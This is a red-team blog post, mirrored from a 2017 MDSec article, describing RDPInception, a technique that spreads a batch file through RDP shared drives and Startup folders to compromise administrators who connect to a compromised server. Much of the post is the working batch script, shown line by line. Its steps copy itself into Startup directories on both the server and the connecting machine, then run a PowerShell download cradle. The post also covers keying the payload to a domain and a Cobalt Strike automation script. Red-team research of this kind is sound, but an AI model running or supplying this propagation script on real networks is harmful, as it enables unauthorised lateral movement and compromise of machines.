Note: posted in June 2017
This post was originally published on https://www.mdsec.co.uk/blog/ when I was under employment of MDSec Consulting Limited in the United Kingdom. This is mirrored on my own blog for archiving reasons.
Remote Desktop is often used by Systems Administrators to remotely manage machines. In a lot of organisations this could mean that a machine is placed in a DMZ or segregated part of the network that should not require any TCP port access other than TCP 3389 into the network segment.
However, users are able to “Choose the devices and resources that you want to use in your remote session” such as sharing of the Local Disk, as shown in the following screenshot:
A theoretical attack path and risk that is often spoken of is one which allows for the target server that is accepting the RDP connections to then attack the visiting machine that is connecting in. Vincent Yiu of the ActiveBreach team (at the time of this post, Vincent was a Red Team lead on the ActiveBreach red team) demonstrates this attack with the RDPInception proof of concept script that will recursively attack visitors of RDP servers. The ActiveBreach team have utilised this technique on multiple adversary simulation assessments and have received good results.
RDPInception is based off of a simple concept, “Startup” programs. This is using the traditional well known “startup” directory to force users logging in to execute code.
Consider the following scenario:
An attacker has compromised the Database server. An Administrator is RDPing into the Jump box, into the Domain Controller, into a File Server and finally the Database Server. Within any part of the chain, the attacker can unleash the RDPInception attack and it will theoretically spiral out to obtain a shell on each of the servers in the chain the next time the administrator logs into each machine. The attacker only needs to launch the RDPInception attack on DB001 at this point and the rest will take care of itself and unravel.
This technique can be used for lateral movement in restricted environments without credentials or exploitation.
The attack is most viable in heavily restricted environments where other means of lateral movement and privilege escalation have already been assessed.
Furthermore, consider the scenario where an employee logs in to a server at 4am for 5 minutes. Constructing this attack even if the aggressor was online would be difficult to deploy fast enough even when constantly monitoring for inbound RDP sessions. The RDPInception technique removes the need for monitoring where it could be noisy as a lot of traffic is being generated due to constant query of “query user” to determine RDP sessions on the machine. If the attacker queries this once every hour, the opportunity for deployment may be missed.
The proof of concept for RDPInception is a relatively simple batch script, the details of which we will walk through below:
Switches off echo.
Puts a short timer to ensure that tsclient is mounted.
**timeout** 1 >nul 2>&1
Makes a temp directory on both the visiting machine and the target.
**mkdir** \\tsclient\c\temp >nul 2>&1**mkdir** C:\temp >nul 2>&1
Copies this file into the directories.
**copy** run.bat C:\temp >nul 2>&1**copy** run.bat \\tsclient\c\temp >nul 2>&1
Ensure a text file does not exist in %TEMP%
del /**q** %TEMP%\temp_00.txt >nul 2>&1
Scans for startup directories on both the visiting machine and the target.
**set** **dirs**=dir /a:d /b /s C:\users\*Startup***set** **dirs**2=dir /a:d /b /s \\tsclient\c\users\*startup***echo**|%**dirs**%|findstr /i “Microsoft\Windows\Start Menu\Programs\Startup”>>”%TEMP%\temp_00.txt”**echo**|%**dirs**2%|findstr /i “Microsoft\Windows\Start Menu\Programs\Startup”>>”%TEMP%\temp_00.txt”
Runs through each path and attempts to propagate the file to it.
**for** /F “tokens=*” %%a **in** (%TEMP%\temp_00.txt) DO (**copy** run.bat “%%a” >nul 2>&1**copy** C:\temp\run.bat “%%a” >nul 2>&1**copy** \\tsclient\c\temp\run.bat “%%a” >nul 2>&1)
Cleans up %TEMP% file
del /**q** %TEMP%\temp_00.txt >nul 2>&1Execute the PowerShell download cradle.powershell.exe <**cradle** here>
In order to limit compromise to machines with a given condition it is often recommended to wrap the download cradle or payload execution around a condition statement.
Common environment keys we can use include:
For the example of using the user domain we can modify the script as such:
If "**<DOMAINNAME>**"=="%USERDOMAIN%" (**<powershell cradle here>**)
An aggressor script has been implemented to automate this process from within the Cobalt Strike framework, along with a batch script that can be modified to use manually or alongside other tools such as Empire.
Run rdpinception and select a HTTP, HTTPS or DNS listener and it will run regardless with no keying.
However, if you run rdpinception ACME, it will key on the ACME domain and only run on a machine joined to a domain called ACME.
Vincent talks through the attack in the below video:
All the tools can be downloaded from GitHub .